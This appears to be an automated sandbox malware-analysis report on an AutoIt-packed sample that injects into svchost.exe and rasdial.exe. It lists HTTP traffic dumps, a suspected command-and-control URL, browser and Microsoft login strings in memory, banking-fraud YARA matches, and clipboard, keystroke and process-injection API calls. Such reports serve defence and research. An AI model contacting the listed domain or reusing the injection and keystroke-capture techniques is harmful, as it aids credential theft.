                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 20:47:49 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Fri, 10 Jan 2025 20:47:55 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 9a 4c 40 9b 43 af 7c f6 3e 26 86 87 14 22 85 0d 25 10 a5 c3 64 67 1c b9 62 74 c6 2a 67 d4 ca 63 0e de 74 19 5c 87 5d fa d0 39 f5 88 1b ec 9f 42 24 87 1d 8f 9a 40 10 25 72 f2 1f 66 c9 bc 87 55 52 e3 91 f1 30 d5 c7 6c 86 a9 ca 28 4e a0 e4 32 29 9f 84 a2 9a 3d 07 8d 02 89 20 6c fe 04 4d 9c 68 3c 2a 9f d5 85 98 d1 ea ae bc 13 08 16 9d 59 d9 3a 74 fe ae d0 79 e4 54 8f 2b c5 c9 2c 0f 15 12 01 5a 03 46 83 17 d2 01 39 b3 46 7b 5e 4c 3b 02 98 92 8e e5 fe 7d 22 e9 be 68 9a 38 b4 67 59 ce 88 c9 3e fd de a1 8e 71 2e f5 32 0b a5 10 68 c2 a1 93 1f 05 b6 a8 98 97 6b cc 6b 85 cc 92 04 5e e4 4f 9e 1e f1 fa cc a3 24 4e 68 e6 75 fd a6 ef 42 cb 2b 63 39 da 3e 14 28 10 c8 3a c9 c1 2e 
2b 76 19 8f fb 36 49 e6 57 14 b6 8d 9c 60 dc 6c 32 88 fb c0 78 08 9a cd e7 63 78 7a c5 93 eb 2b 3a 9e 0e 7d 5f 85 95 2d 6f 68 57 ae 76 54 1e 1b b4 24 64 b5 83 1f d2 e3 6d 87 34 f8 8d 15 dc f6 f2 91 f2 37 94 8d c3 a0 2f e3 6b e9 e8 b7 17 cc 9f 44 df 61 2d 34 b1 5f 4a 74 f0 5d d7 13 20 f5 83 25 0c 36 04 24 8c f3 a4 1c 59 d5 76 4c ef 80 69 3e 06 46 fe ac 6a ba 33 04 0b b1 fd bd 62 8d 02 43 7b 1e 2e 99 97 7e d2 86 93 e0 e6 c1 cc 70 94 c3 c1 ee 2f b4 ff 0d 2b 0f 61 e1 04 00 00 0d 0a Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$Nhu
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; content-type: text/html; cache-control: private, no-cache, max-age=0; pragma: no-cache; date: Fri, 10 Jan 2025 20:47:57 GMT; server: LiteSpeed; content-encoding: gzip; vary: Accept-Encoding; transfer-encoding: chunked; connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; content-type: text/html; cache-control: private, no-cache, max-age=0; pragma: no-cache; date: Fri, 10 Jan 2025 20:48:00 GMT; server: LiteSpeed; content-encoding: gzip; vary: Accept-Encoding; transfer-encoding: chunked; connection: close | Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a | Data Ascii: a
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; content-type: text/html; cache-control: private, no-cache, max-age=0; pragma: no-cache; content-length: 1249; date: Fri, 10 Jan 2025 20:48:03 GMT; server: LiteSpeed; connection: close
                Source: TrOCMVbhcDRPP.exe, 00000009.00000002.3387326168.0000000005182000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.jalan2.online
                Source: TrOCMVbhcDRPP.exe, 00000009.00000002.3387326168.0000000005182000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.jalan2.online/lvda/
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: rasdial.exe, 00000007.00000003.2632104261.00000000079C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_00134164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00134164
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_00133F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00133F66
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_0012001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_0012001C
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_0014CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0014CABC

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3385516192.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3381605146.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2456155033.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: This is a third-party compiled AutoIt script.0_2_000C3B3A
                Source: fFoOcuxK7M.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: fFoOcuxK7M.exe, 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a695c1c7-3
                Source: fFoOcuxK7M.exe, 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e215243f-e
                Source: fFoOcuxK7M.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f86be1ad-1
                Source: fFoOcuxK7M.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_02648ffa-6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C8B3 NtClose,2_2_0042C8B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0012A1EF
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00118310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00118310
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001251BD
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000CE6A00_2_000CE6A0
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000ED9750_2_000ED975
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000CFCE00_2_000CFCE0
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E21C50_2_000E21C5
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F62D20_2_000F62D2
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001403DA0_2_001403DA
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F242E0_2_000F242E
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E25FA0_2_000E25FA
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0011E6160_2_0011E616
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D66E10_2_000D66E1
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F878F0_2_000F878F
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D88080_2_000D8808
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001408570_2_00140857
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F68440_2_000F6844
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001288890_2_00128889
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000ECB210_2_000ECB21
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F6DB60_2_000F6DB6
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D6F9E0_2_000D6F9E
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D30300_2_000D3030
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E31870_2_000E3187
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000EF1D90_2_000EF1D9
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C12870_2_000C1287
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E14840_2_000E1484
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D55200_2_000D5520
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E76960_2_000E7696
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D57600_2_000D5760
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E19780_2_000E1978
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F9AB50_2_000F9AB5
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E1D900_2_000E1D90
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000EBDA60_2_000EBDA6
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00147DDB0_2_00147DDB
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000CDF000_2_000CDF00
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000D3FE00_2_000D3FE0
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_014D00200_2_014D0020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004187732_2_00418773
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041696F2_2_0041696F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004169732_2_00416973
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101C32_2_004101C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1B32_2_0040E1B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022FD2_2_004022FD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E2FE2_2_0040E2FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023002_2_00402300
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3032_2_0040E303
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026602_2_00402660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E802_2_00402E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EF332_2_0042EF33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF9C2_2_0040FF9C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FFA32_2_0040FFA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
